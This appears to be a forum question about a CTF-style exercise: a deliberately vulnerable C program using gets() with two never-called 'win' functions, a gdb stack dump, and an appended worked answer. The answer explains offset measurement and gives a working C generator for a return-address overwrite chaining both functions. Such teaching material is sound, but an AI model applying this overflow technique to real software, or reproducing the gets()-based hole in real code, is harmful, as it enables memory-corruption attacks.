So I have this program in C that I'm trying to exploit, which has a vulnerability in a function, namely that it uses gets. I'm trying to overflow the buffer and change the return address so the program returns into one or both of the two functions that are never called.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/* Neither of these is ever called; the goal is to return into them. */
void half_win()
{
    printf("Well done, you got half the score\n");
}

void complete_win()
{
    printf("FULL SCORE\n");
}

void vuln_func()
{
    char buffer[36];
    gets(buffer);   /* no bounds check: the overflow target */
    printf("You have entered: %s\n", buffer);
}

int main(int argc, char **argv)
{
    vuln_func();
}
So I overflow the buffer, then go to check the esp to calculate the offset by subtracting the address where the buffer starts from the esp's address, but what's strange is that the buffer seems to overwrite the esp.
(gdb) x/24wx $esp
0xffffd0c8: 0x41414141 0x41414141 0x41414141 0xffffd100
0xffffd0d8: 0xffffd16c 0xffffd0f4 0x00000001 0xffffd164
0xffffd0e8: 0xf7fac000 0xf7fe574a 0xffffd160 0x00000000
0xffffd0f8: 0xf7fac000 0x00000000 0x00000000 0x98862ada
0xffffd108: 0xdada4cca 0x00000000 0x00000000 0x00000000
0xffffd118: 0x00000040 0xf7ffd024 0x00000000 0x00000000
So both addresses are the same, so the offset value is 0. I can't figure out what I'm doing wrong here. If anyone could give some guidance, you'd really be saving me.
It's running on Ubuntu, by the way.
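The following is an added example, not code from the original post, showing the payload layout such a return-address overwrite needs. The offset to measure is the distance from the start of buffer to the saved return address of vuln_func, which on an unoptimised 32-bit build with a frame pointer sits at $ebp+4 while vuln_func is active (gdb's info frame prints it as "eip at 0x..."); $esp at a breakpoint after gets points at the lowest live data of the frame, which is why subtracting it from the buffer address gives 0. The offset value, the two function addresses and the program name in this example are placeholders; real ones come from info frame and from nm ./vuln or gdb's p half_win on the actual binary.

```c
/* Added example (not from the original post): build a gets()-delivered
 * return-address overwrite that chains half_win -> complete_win.
 *
 * Assumptions (placeholders, not values from the post):
 *   - 32-bit x86, no PIE, frame pointer in use, so vuln_func's saved
 *     return address sits at $ebp+4, a fixed distance ret_offset from
 *     the start of `buffer`.
 *   - The function addresses and DEMO_RET_OFFSET below are hypothetical;
 *     take real ones from `nm ./vuln | grep win` and gdb's `info frame`.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HALF_WIN_ADDR     0x08049196u  /* hypothetical */
#define COMPLETE_WIN_ADDR 0x080491aeu  /* hypothetical */
#define DEMO_RET_OFFSET   40u          /* hypothetical: &saved_ret - &buffer[0] */

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = v & 0xff;
    p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff;
    p[3] = (v >> 24) & 0xff;
}

uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Fill `out` with ret_offset bytes of padding followed by `n` 32-bit
 * addresses in little-endian order. Returns the payload length, or 0 if
 * `out` is too small. Stack layout after gets() copies it in:
 *   buffer[0..ret_offset)  padding (also clobbers the saved ebp)
 *   ret_offset             vuln_func's return address -> targets[0]
 *   ret_offset+4           targets[0]'s return address -> targets[1]
 * Each target's own `ret` pops the next address in the chain. */
size_t build_ret_chain(uint8_t *out, size_t cap, size_t ret_offset,
                       const uint32_t *targets, size_t n)
{
    size_t len = ret_offset + 4 * n;
    if (len > cap)
        return 0;
    memset(out, 'A', ret_offset);
    for (size_t i = 0; i < n; i++)
        put_le32(out + ret_offset + 4 * i, targets[i]);
    return len;
}

/* gets() stops at the first '\n' (0x0a), so an address containing that
 * byte would truncate the payload. NUL bytes are fine: gets() stores them. */
int payload_is_gets_safe(const uint8_t *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == '\n')
            return 0;
    return 1;
}

uint8_t demo_payload[64];

/* Build the two-stage chain with the placeholder addresses. */
size_t demo_build(size_t ret_offset)
{
    uint32_t targets[2] = { HALF_WIN_ADDR, COMPLETE_WIN_ADDR };
    return build_ret_chain(demo_payload, sizeof demo_payload,
                           ret_offset, targets, 2);
}

/* Usage: ./gen <ret_offset> <addr1> [addr2 ...] | ./vuln */
int main(int argc, char **argv)
{
    if (argc < 3) {
        fprintf(stderr, "usage: %s <ret_offset> <addr>...\n", argv[0]);
        return 1;
    }
    size_t ret_offset = strtoul(argv[1], NULL, 0);
    uint32_t targets[8];
    size_t n = 0;
    for (int i = 2; i < argc && n < 8; i++)
        targets[n++] = (uint32_t)strtoul(argv[i], NULL, 0);

    uint8_t payload[256];
    size_t len = build_ret_chain(payload, sizeof payload, ret_offset, targets, n);
    if (len == 0) {
        fprintf(stderr, "payload too large\n");
        return 1;
    }
    if (!payload_is_gets_safe(payload, len)) {
        fprintf(stderr, "an address contains 0x0a; gets() would truncate\n");
        return 1;
    }
    fwrite(payload, 1, len, stdout);
    fputc('\n', stdout);  /* terminates the gets() read */
    return 0;
}
```

With the chain [padding][half_win][complete_win], vuln_func's ret lands in half_win, and half_win's own ret then pops complete_win's address, so both messages print; complete_win's ret afterwards pops whatever stack garbage follows the payload and the process will normally crash, which is expected for this exercise. Padding overwrites the saved ebp too, so the win functions run with a junk frame pointer; that is harmless here because they only call printf.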